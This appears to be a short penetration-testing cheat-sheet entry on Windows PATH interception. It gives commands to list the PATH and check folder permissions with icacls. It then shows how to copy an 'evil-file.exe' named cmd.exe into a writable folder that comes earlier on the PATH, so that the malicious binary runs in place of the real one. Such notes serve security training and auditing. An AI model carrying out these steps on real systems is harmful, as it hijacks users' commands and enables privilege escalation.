$PATH Interception

Requirements:

• PATH contains a writeable folder with low privileges.

• The writeable folder is before the folder that contains the legitimate binary.

EXAMPLE:

List contents of the PATH environment variable

$env:Path

EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32

See permissions of the target folder:

icacls.exe "C:\Program Files\nodejs\"

EXAMPLE OUTPUT: BUILTIN\Users: GR,GW

Place our evil-file in that folder:

copy evil-file.exe "C:\Program Files\nodejs\cmd.exe"

Because (in this example) "C:\Program Files\nodejs" is before "C:\WINDOWS\system32" on the PATH variable, the next time the user runs "cmd.exe", our evil version in the nodejs folder will run, instead of the legitimate one in the system32 folder.